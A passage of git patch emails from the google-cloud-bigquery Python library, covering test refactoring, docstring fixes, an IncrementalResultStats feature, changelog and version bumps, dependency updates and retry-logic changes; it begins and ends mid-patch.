(other.foreign_keys if other.foreign_keys else None) @classmethod def from_api_repr(cls, resource: Dict[str, Any]) -> "TableConstraints": diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index eb2c8d9ec..af31d116b 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -6322,82 +6322,6 @@ def test_constructor_explicit_with_none(self): self.assertIsNone(table_constraint.primary_key) self.assertIsNone(table_constraint.foreign_keys) - def test__eq__primary_key_mismatch(self): - from google.cloud.bigquery.table import ( - PrimaryKey, - ForeignKey, - TableReference, - ColumnReference, - ) - - foriegn_keys = [ - ForeignKey( - name="my_fk_id", - referenced_table=TableReference.from_string( - "my-project.my-dataset.my-table" - ), - column_references=[ - ColumnReference(referencing_column="id", referenced_column="id"), - ], - ), - ] - - table_constraint = self._make_one( - primary_key=PrimaryKey(columns=["my_pk_id"]), - foreign_keys=foriegn_keys, - ) - other_table_constraint = self._make_one( - primary_key=PrimaryKey(columns=["my_other_pk_id"]), - foreign_keys=foriegn_keys, - ) - - self.assertNotEqual(table_constraint, other_table_constraint) - - def test__eq__foreign_keys_mismatch(self): - from google.cloud.bigquery.table import ( - PrimaryKey, - ForeignKey, - TableReference, - ColumnReference, - ) - - primary_key = PrimaryKey(columns=["my_pk_id"]) - - table_constraint = self._make_one( - primary_key=primary_key, - foreign_keys=[ - ForeignKey( - name="my_fk_id", - referenced_table=TableReference.from_string( - "my-project.my-dataset.my-table" - ), - column_references=[ - ColumnReference( - referencing_column="id", referenced_column="id" - ), - ], - ), - ], - ) - other_table_constraint = self._make_one( - primary_key=primary_key, - foreign_keys=[ - ForeignKey( - name="my_other_fk_id", - referenced_table=TableReference.from_string( - "my-project.my-dataset.my-other-table" - ), - column_references=[ - ColumnReference( - 
referencing_column="other_id", referenced_column="other_id" - ), - ], - ), - ], - ) - - self.assertNotEqual(table_constraint, other_table_constraint) - def test__eq__other_type(self): from google.cloud.bigquery.table import ( PrimaryKey, @@ -6615,6 +6539,74 @@ def test_to_api_repr_empty_constraints(self): self.assertEqual(instance.to_api_repr(), expected) +@pytest.mark.parametrize( + "self_pk_name,self_fk_name,other_pk_name,other_fk_name,expected_equal", + [ + (None, None, None, None, True), + ("pkey", None, "pkey", None, True), + ("pkey", "fkey", "pkey", "fkey", True), + (None, "fkey", None, "fkey", True), + ("pkey", None, "pkey_no_match", None, False), + ("pkey", "fkey", "pkey_no_match", "fkey_no_match", False), + (None, "fkey", None, "fkey_no_match", False), + ("pkey", "fkey", "pkey_no_match", "fkey", False), + ("pkey", "fkey", "pkey", "fkey_no_match", False), + ], +) +def test_table_constraint_eq_parametrized( + self_pk_name, self_fk_name, other_pk_name, other_fk_name, expected_equal +): + # Imports are placed here to ensure they are self-contained for this example. + # In a real test file, they would likely be at the top of the file. 
+ from google.cloud.bigquery.table import ( + ColumnReference, + ForeignKey, + PrimaryKey, + TableReference, + TableConstraints, + ) + + # Helper function to create a PrimaryKey object or None + def _create_primary_key(name): + if name is None: + return None + return PrimaryKey(columns=[name]) + + # Helper function to create a list of ForeignKey objects or None + def _create_foreign_keys(name): + if name is None: + return None + # Using a generic referenced_table and column_references for simplicity + # The 'name' parameter ensures different ForeignKey objects for different names + return [ + ForeignKey( + name=name, + referenced_table=TableReference.from_string( + f"my-project.my-dataset.{name}_referenced_table" + ), + column_references=[ + ColumnReference( + referencing_column=f"{name}_ref_col", + referenced_column=f"{name}_pk_col", + ) + ], + ) + ] + + # Create the two TableConstraints instances for comparison + tc1 = TableConstraints( + primary_key=_create_primary_key(self_pk_name), + foreign_keys=_create_foreign_keys(self_fk_name), + ) + tc2 = TableConstraints( + primary_key=_create_primary_key(other_pk_name), + foreign_keys=_create_foreign_keys(other_fk_name), + ) + + # Assert the equality based on the expected outcome + assert (tc1 == tc2) == expected_equal + + class TestExternalCatalogTableOptions: PROJECT = "test-project" DATASET_ID = "test_dataset" From 8a13c12905ffcb3dbb6086a61df37556f0c2cd31 Mon Sep 17 00:00:00 2001 From: shollyman Date: Thu, 4 Sep 2025 13:25:49 -0500 Subject: [PATCH 167/202] docs: clarify the api_method arg for client.query() (#2277) * docs: clarify the api_method arg for client.query() --- google/cloud/bigquery/client.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 4ca2cb428..ea592852a 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -3519,7 +3519,8 @@ def query( specified here becomes the default 
``job_retry`` for ``result()``, where it can also be specified. api_method (Union[str, enums.QueryApiMethod]): - Method with which to start the query job. + Method with which to start the query job. By default, + the jobs.insert API is used for starting a query. See :class:`google.cloud.bigquery.enums.QueryApiMethod` for details on the difference between the query start methods. From 33ea29616c06a2e2a106a785d216e784737ae386 Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Sat, 6 Sep 2025 10:16:44 -0700 Subject: [PATCH 168/202] fix: remove deepcopy while setting properties for _QueryResults (#2280) --- google/cloud/bigquery/query.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/google/cloud/bigquery/query.py b/google/cloud/bigquery/query.py index 7f70f6a2a..170ed2976 100644 --- a/google/cloud/bigquery/query.py +++ b/google/cloud/bigquery/query.py @@ -1400,7 +1400,7 @@ def _set_properties(self, api_response): api_response (Dict): Response returned from an API call """ self._properties.clear() - self._properties.update(copy.deepcopy(api_response)) + self._properties.update(api_response) def _query_param_from_api_repr(resource): From 6e88d7dbe42ebfc35986da665d656b49ac481db4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Mon, 8 Sep 2025 09:58:27 -0500 Subject: [PATCH 169/202] docs: clarify that the presence of `XyzJob.errors` doesn't necessarily mean that the job has not completed or was unsuccessful (#2278) Internal issue b/440349994 --- google/cloud/bigquery/job/base.py | 22 +++++++++++++++++++--- 1 file changed, 19 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index 1344082be..9b7ddb82d 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -693,7 +693,12 @@ def transaction_info(self) -> Optional[TransactionInfo]: @property def error_result(self): - """Error information about the job as a whole. + """Output only. 
Final error result of the job. + + If present, indicates that the job has completed and was unsuccessful. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobStatus.FIELDS.error_result Returns: Optional[Mapping]: the error information (None until set from the server). @@ -704,7 +709,13 @@ def error_result(self): @property def errors(self): - """Information about individual errors generated by the job. + """Output only. The first errors encountered during the running of the job. + + The final message includes the number of errors that caused the process to stop. + Errors here do not necessarily mean that the job has not completed or was unsuccessful. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobStatus.FIELDS.errors Returns: Optional[List[Mapping]]: @@ -716,7 +727,12 @@ def errors(self): @property def state(self): - """Status of the job. + """Output only. Running state of the job. + + Valid states include 'PENDING', 'RUNNING', and 'DONE'. 
+ + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobStatus.FIELDS.state Returns: Optional[str]: From 4b0ef0cfcf7def138e43a22223abfcbefc330da2 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Tue, 9 Sep 2025 10:01:33 -0700 Subject: [PATCH 170/202] chore(main): release 3.37.0 (#2269) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 18 ++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 19 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 62352c344..fe721dfde 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,24 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.37.0](https://github.com/googleapis/python-bigquery/compare/v3.36.0...v3.37.0) (2025-09-08) + + +### Features + +* Updates to fastpath query execution ([#2268](https://github.com/googleapis/python-bigquery/issues/2268)) ([ef2740a](https://github.com/googleapis/python-bigquery/commit/ef2740a158199633b5543a7b6eb19587580792cd)) + + +### Bug Fixes + +* Remove deepcopy while setting properties for _QueryResults ([#2280](https://github.com/googleapis/python-bigquery/issues/2280)) ([33ea296](https://github.com/googleapis/python-bigquery/commit/33ea29616c06a2e2a106a785d216e784737ae386)) + + +### Documentation + +* Clarify that the presence of `XyzJob.errors` doesn't necessarily mean that the job has not completed or was unsuccessful ([#2278](https://github.com/googleapis/python-bigquery/issues/2278)) ([6e88d7d](https://github.com/googleapis/python-bigquery/commit/6e88d7dbe42ebfc35986da665d656b49ac481db4)) +* Clarify the api_method arg for client.query() ([#2277](https://github.com/googleapis/python-bigquery/issues/2277)) ([8a13c12](https://github.com/googleapis/python-bigquery/commit/8a13c12905ffcb3dbb6086a61df37556f0c2cd31)) + ## 
[3.36.0](https://github.com/googleapis/python-bigquery/compare/v3.35.1...v3.36.0) (2025-08-20) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index a8f4c8e14..aa24ae04e 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.36.0" +__version__ = "3.37.0" From 7b1b718123afd80c0f68212946e4179bcd6db67f Mon Sep 17 00:00:00 2001 From: shollyman Date: Sat, 13 Sep 2025 08:02:19 -0700 Subject: [PATCH 171/202] feat: add additional query stats (#2270) * feat: add additional query stats This PR adds support for incremental query stats. --- google/cloud/bigquery/job/__init__.py | 2 + google/cloud/bigquery/job/query.py | 67 +++++++++++++++++++++++++++ tests/unit/job/test_query.py | 17 +++++++ tests/unit/job/test_query_stats.py | 61 ++++++++++++++++++++++++ 4 files changed, 147 insertions(+) diff --git a/google/cloud/bigquery/job/__init__.py b/google/cloud/bigquery/job/__init__.py index f51311b0b..4cda65965 100644 --- a/google/cloud/bigquery/job/__init__.py +++ b/google/cloud/bigquery/job/__init__.py @@ -39,6 +39,7 @@ from google.cloud.bigquery.job.query import QueryPlanEntryStep from google.cloud.bigquery.job.query import ScriptOptions from google.cloud.bigquery.job.query import TimelineEntry +from google.cloud.bigquery.job.query import IncrementalResultStats from google.cloud.bigquery.enums import Compression from google.cloud.bigquery.enums import CreateDisposition from google.cloud.bigquery.enums import DestinationFormat @@ -84,4 +85,5 @@ "SourceFormat", "TransactionInfo", "WriteDisposition", + "IncrementalResultStats", ] diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index b377f979d..38b8a7148 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -197,6 +197,66 @@ def from_api_repr(cls, stats: 
Dict[str, str]) -> "DmlStats": return cls(*args) +class IncrementalResultStats: + """IncrementalResultStats provides information about incremental query execution.""" + + def __init__(self): + self._properties = {} + + @classmethod + def from_api_repr(cls, resource) -> "IncrementalResultStats": + """Factory: construct instance from the JSON repr. + + Args: + resource(Dict[str: object]): + IncrementalResultStats representation returned from API. + + Returns: + google.cloud.bigquery.job.IncrementalResultStats: + stats parsed from ``resource``. + """ + entry = cls() + entry._properties = resource + return entry + + @property + def disabled_reason(self): + """Optional[string]: Reason why incremental results were not + written by the query. + """ + return _helpers._str_or_none(self._properties.get("disabledReason")) + + @property + def result_set_last_replace_time(self): + """Optional[datetime]: The time at which the result table's contents + were completely replaced. May be absent if no results have been written + or the query has completed.""" + from google.cloud._helpers import _rfc3339_nanos_to_datetime + + value = self._properties.get("resultSetLastReplaceTime") + if value: + try: + return _rfc3339_nanos_to_datetime(value) + except ValueError: + pass + return None + + @property + def result_set_last_modify_time(self): + """Optional[datetime]: The time at which the result table's contents + were modified. May be absent if no results have been written or the + query has completed.""" + from google.cloud._helpers import _rfc3339_nanos_to_datetime + + value = self._properties.get("resultSetLastModifyTime") + if value: + try: + return _rfc3339_nanos_to_datetime(value) + except ValueError: + pass + return None + + class IndexUnusedReason(typing.NamedTuple): """Reason about why no search index was used in the search query (or sub-query). 
@@ -1339,6 +1399,13 @@ def bi_engine_stats(self) -> Optional[BiEngineStats]: else: return BiEngineStats.from_api_repr(stats) + @property + def incremental_result_stats(self) -> Optional[IncrementalResultStats]: + stats = self._job_statistics().get("incrementalResultStats") + if stats is None: + return None + return IncrementalResultStats.from_api_repr(stats) + def _blocking_poll(self, timeout=None, **kwargs): self._done_timeout = timeout self._transport_timeout = timeout diff --git a/tests/unit/job/test_query.py b/tests/unit/job/test_query.py index ef6429598..4a6771c46 100644 --- a/tests/unit/job/test_query.py +++ b/tests/unit/job/test_query.py @@ -838,6 +838,23 @@ def test_search_stats(self): assert isinstance(job.search_stats, SearchStats) assert job.search_stats.mode == "INDEX_USAGE_MODE_UNSPECIFIED" + def test_incremental_result_stats(self): + from google.cloud.bigquery.job.query import IncrementalResultStats + + client = _make_client(project=self.PROJECT) + job = self._make_one(self.JOB_ID, self.QUERY, client) + assert job.incremental_result_stats is None + + statistics = job._properties["statistics"] = {} + assert job.incremental_result_stats is None + + query_stats = statistics["query"] = {} + assert job.incremental_result_stats is None + + query_stats["incrementalResultStats"] = {"disabledReason": "BAZ"} + assert isinstance(job.incremental_result_stats, IncrementalResultStats) + assert job.incremental_result_stats.disabled_reason == "BAZ" + def test_reload_query_results_uses_transport_timeout(self): conn = make_connection({}) client = _make_client(self.PROJECT, connection=conn) diff --git a/tests/unit/job/test_query_stats.py b/tests/unit/job/test_query_stats.py index 61b278d43..c7c7a31e0 100644 --- a/tests/unit/job/test_query_stats.py +++ b/tests/unit/job/test_query_stats.py @@ -13,6 +13,7 @@ # limitations under the License. 
from .helpers import _Base +import datetime class TestBiEngineStats: @@ -520,3 +521,63 @@ def test_from_api_repr_normal(self): self.assertEqual(entry.pending_units, self.PENDING_UNITS) self.assertEqual(entry.completed_units, self.COMPLETED_UNITS) self.assertEqual(entry.slot_millis, self.SLOT_MILLIS) + + +class TestIncrementalResultStats: + @staticmethod + def _get_target_class(): + from google.cloud.bigquery.job import IncrementalResultStats + + return IncrementalResultStats + + def _make_one(self, *args, **kw): + return self._get_target_class()(*args, **kw) + + def test_ctor_defaults(self): + stats = self._make_one() + assert stats.disabled_reason is None + assert stats.result_set_last_replace_time is None + assert stats.result_set_last_modify_time is None + + def test_from_api_repr_partial_stats(self): + klass = self._get_target_class() + stats = klass.from_api_repr({"disabledReason": "FOO"}) + + assert isinstance(stats, klass) + assert stats.disabled_reason == "FOO" + assert stats.result_set_last_replace_time is None + assert stats.result_set_last_modify_time is None + + def test_from_api_repr_full_stats(self): + klass = self._get_target_class() + stats = klass.from_api_repr( + { + "disabledReason": "BAR", + "resultSetLastReplaceTime": "2025-01-02T03:04:05.06Z", + "resultSetLastModifyTime": "2025-02-02T02:02:02.02Z", + } + ) + + assert isinstance(stats, klass) + assert stats.disabled_reason == "BAR" + assert stats.result_set_last_replace_time == datetime.datetime( + 2025, 1, 2, 3, 4, 5, 60000, tzinfo=datetime.timezone.utc + ) + assert stats.result_set_last_modify_time == datetime.datetime( + 2025, 2, 2, 2, 2, 2, 20000, tzinfo=datetime.timezone.utc + ) + + def test_from_api_repr_invalid_stats(self): + klass = self._get_target_class() + stats = klass.from_api_repr( + { + "disabledReason": "BAR", + "resultSetLastReplaceTime": "xxx", + "resultSetLastModifyTime": "yyy", + } + ) + + assert isinstance(stats, klass) + assert stats.disabled_reason == "BAR" + assert 
stats.result_set_last_replace_time is None + assert stats.result_set_last_modify_time is None From c9aba64c1f7240f1ad2caa00d55a1a4f86bdc8a3 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 15 Sep 2025 14:21:21 +0200 Subject: [PATCH 172/202] chore(deps): update all dependencies (#2275) --- samples/desktopapp/requirements-test.txt | 2 +- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements-test.txt | 2 +- samples/geography/requirements.txt | 10 +++++----- samples/magics/requirements-test.txt | 2 +- samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements-test.txt | 2 +- samples/notebooks/requirements.txt | 4 ++-- samples/snippets/requirements-test.txt | 2 +- samples/snippets/requirements.txt | 2 +- 10 files changed, 16 insertions(+), 16 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 3bf52c85d..31b836790 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.4.1 +pytest==8.4.2 mock==5.2.0 pytest-xdist==3.8.0 diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index f86e57e5c..21ccef2fd 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.36.0 +google-cloud-bigquery==3.37.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index d449b373b..6fb9ba310 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ -pytest==8.4.1 +pytest==8.4.2 mock==5.2.0 pytest-xdist==3.8.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index c2bd74bed..c8a93a35e 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,6 +1,6 @@ attrs==25.3.0 certifi==2025.8.3 
-cffi==1.17.1 +cffi==2.0.0 charset-normalizer==3.4.3 click===8.1.8; python_version == '3.9' click==8.2.1; python_version >= '3.10' @@ -13,8 +13,8 @@ geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; python_version >= '3.10' google-api-core==2.25.1 google-auth==2.40.3 -google-cloud-bigquery==3.36.0 -google-cloud-bigquery-storage==2.32.0 +google-cloud-bigquery==3.37.0 +google-cloud-bigquery-storage==2.33.1 google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 @@ -29,8 +29,8 @@ proto-plus==1.26.1 pyarrow==21.0.0 pyasn1==0.6.1 pyasn1-modules==0.4.2 -pycparser==2.22 -pyparsing==3.2.3 +pycparser==2.23 +pyparsing==3.2.4 python-dateutil==2.9.0.post0 pytz==2025.2 PyYAML==6.0.2 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 3bf52c85d..31b836790 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.4.1 +pytest==8.4.2 mock==5.2.0 pytest-xdist==3.8.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 7b4f84e8e..d10d53c24 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.10.3 db-dtypes==1.4.3 -google.cloud.bigquery==3.36.0 -google-cloud-bigquery-storage==2.32.0 +google.cloud.bigquery==3.37.0 +google-cloud-bigquery-storage==2.33.1 ipython===8.18.1 pandas==2.3.2 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 3bf52c85d..31b836790 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.4.1 +pytest==8.4.2 mock==5.2.0 pytest-xdist==3.8.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index dc22903c7..f65008baa 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,7 +1,7 @@ 
bigquery-magics==0.10.3 db-dtypes==1.4.3 -google-cloud-bigquery==3.36.0 -google-cloud-bigquery-storage==2.32.0 +google-cloud-bigquery==3.37.0 +google-cloud-bigquery-storage==2.33.1 ipython===8.18.1; python_version == '3.9' ipython==9.5.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index cef3450e1..901f1df1a 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" google-cloud-testutils==1.6.4 -pytest==8.4.1 +pytest==8.4.2 mock==5.2.0 pytest-xdist==3.8.0 diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index 23da68d60..1fed246f3 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.36.0 +google-cloud-bigquery==3.37.0 From 7cad6cf2f95e28b46e529f99b5c4d3cc61603ca4 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Wed, 17 Sep 2025 13:23:31 -0700 Subject: [PATCH 173/202] chore(main): release 3.38.0 (#2289) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 7 +++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index fe721dfde..95db5735c 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,13 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.38.0](https://github.com/googleapis/python-bigquery/compare/v3.37.0...v3.38.0) (2025-09-15) + + +### Features + +* Add additional query stats ([#2270](https://github.com/googleapis/python-bigquery/issues/2270)) ([7b1b718](https://github.com/googleapis/python-bigquery/commit/7b1b718123afd80c0f68212946e4179bcd6db67f)) + 
## [3.37.0](https://github.com/googleapis/python-bigquery/compare/v3.36.0...v3.37.0) (2025-09-08) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index aa24ae04e..22550a8f1 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.37.0" +__version__ = "3.38.0" From 1f1f9d41e8a2c9016198d848ad3f1cbb88cf77b0 Mon Sep 17 00:00:00 2001 From: shollyman Date: Fri, 19 Sep 2025 10:19:42 -0700 Subject: [PATCH 174/202] docs: remove experimental annotations from GA features (#2303) * docs: remove experimental annotations from GA features Corrects some documentation drift. --- google/cloud/bigquery/external_config.py | 20 +++----------------- 1 file changed, 3 insertions(+), 17 deletions(-) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index dc7a33e6a..7e76f93b5 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -637,11 +637,7 @@ def from_api_repr(cls, resource: dict) -> "GoogleSheetsOptions": class HivePartitioningOptions(object): - """[Beta] Options that configure hive partitioning. - - .. note:: - **Experimental**. This feature is experimental and might change or - have limited support. + """Options that configure hive partitioning. See https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#HivePartitioningOptions @@ -808,13 +804,9 @@ def decimal_target_types(self, value: Optional[Iterable[str]]): @property def hive_partitioning(self): - """Optional[:class:`~.external_config.HivePartitioningOptions`]: [Beta] When set, \ + """Optional[:class:`~.external_config.HivePartitioningOptions`]: When set, \ it configures hive partitioning support. - .. note:: - **Experimental**. This feature is experimental and might change or - have limited support. 
- See https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.hive_partitioning_options """ @@ -979,14 +971,8 @@ def timestamp_format(self, value: Optional[str]): @property def connection_id(self): - """Optional[str]: [Experimental] ID of a BigQuery Connection API + """Optional[str]: ID of a BigQuery Connection API resource. - - .. WARNING:: - - This feature is experimental. Pre-GA features may have limited - support, and changes to pre-GA features may not be compatible with - other pre-GA versions. """ return self._properties.get("connectionId") From 8bbd3d01026c493dfa5903b397d2b01c0e9bf43b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Wed, 24 Sep 2025 14:29:28 -0500 Subject: [PATCH 175/202] fix: remove ambiguous error codes from query retries (#2308) Context: internal issue b/445984807 comment 10. --- google/cloud/bigquery/retry.py | 3 --- 1 file changed, 3 deletions(-) diff --git a/google/cloud/bigquery/retry.py b/google/cloud/bigquery/retry.py index 8f469f2d3..19012efd6 100644 --- a/google/cloud/bigquery/retry.py +++ b/google/cloud/bigquery/retry.py @@ -121,9 +121,6 @@ def _should_retry_get_job_conflict(exc): """ job_retry_reasons = ( - "rateLimitExceeded", - "backendError", - "internalError", "jobBackendError", "jobInternalError", "jobRateLimitExceeded", From 63d7737cb971c0c96d0b6d3505e30e4696a7bf2a Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 30 Sep 2025 17:05:06 +0100 Subject: [PATCH 176/202] chore(deps): update all dependencies (#2300) --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 16 ++++++++-------- samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements.txt | 6 +++--- samples/snippets/requirements.txt | 2 +- 5 files changed, 15 insertions(+), 15 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index 21ccef2fd..56696f868 100644 --- a/samples/desktopapp/requirements.txt 
+++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.37.0 +google-cloud-bigquery==3.38.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index c8a93a35e..9fdca241a 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -3,7 +3,7 @@ certifi==2025.8.3 cffi==2.0.0 charset-normalizer==3.4.3 click===8.1.8; python_version == '3.9' -click==8.2.1; python_version >= '3.10' +click==8.3.0; python_version >= '3.10' click-plugins==1.1.1.2 cligj==0.7.2 db-dtypes==1.4.3 @@ -12,32 +12,32 @@ geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; python_version >= '3.10' google-api-core==2.25.1 -google-auth==2.40.3 -google-cloud-bigquery==3.37.0 +google-auth==2.41.0 +google-cloud-bigquery==3.38.0 google-cloud-bigquery-storage==2.33.1 google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 googleapis-common-protos==1.70.0 -grpcio==1.74.0 +grpcio==1.75.1 idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 packaging==25.0 -pandas==2.3.2 +pandas==2.3.3 proto-plus==1.26.1 pyarrow==21.0.0 pyasn1==0.6.1 pyasn1-modules==0.4.2 pycparser==2.23 -pyparsing==3.2.4 +pyparsing==3.2.5 python-dateutil==2.9.0.post0 pytz==2025.2 -PyYAML==6.0.2 +PyYAML==6.0.3 requests==2.32.5 rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' -Shapely==2.1.1; python_version >= '3.10' +Shapely==2.1.2; python_version >= '3.10' six==1.17.0 typing-extensions==4.15.0 typing-inspect==0.9.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index d10d53c24..331e910e2 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.10.3 db-dtypes==1.4.3 -google.cloud.bigquery==3.37.0 +google.cloud.bigquery==3.38.0 google-cloud-bigquery-storage==2.33.1 ipython===8.18.1 -pandas==2.3.2 +pandas==2.3.3 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt 
index f65008baa..ef509734a 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,9 +1,9 @@ bigquery-magics==0.10.3 db-dtypes==1.4.3 -google-cloud-bigquery==3.37.0 +google-cloud-bigquery==3.38.0 google-cloud-bigquery-storage==2.33.1 ipython===8.18.1; python_version == '3.9' -ipython==9.5.0; python_version >= '3.10' +ipython==9.6.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' matplotlib==3.10.6; python_version >= '3.10' -pandas==2.3.2 +pandas==2.3.3 diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index 1fed246f3..441385536 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.37.0 +google-cloud-bigquery==3.38.0 From e118b029bbc89a5adbab83f39858c356c23665bf Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 30 Sep 2025 13:54:00 -0400 Subject: [PATCH 177/202] fix: honor custom `retry` in `job.result()` (#2302) * fix(job): honor custom retry in job.result() The `_AsyncJob.result()` method was not correctly passing the `retry` argument to the superclass's `result()` method when the `retry` object was the same as the default retry object. This caused the default retry settings to be ignored in some cases. This change modifies the `result()` method to always pass the `retry` argument to the superclass, ensuring that the provided retry settings are always honored. A new test case is added to verify that `job.result()` correctly handles both the default retry and a custom retry object. 
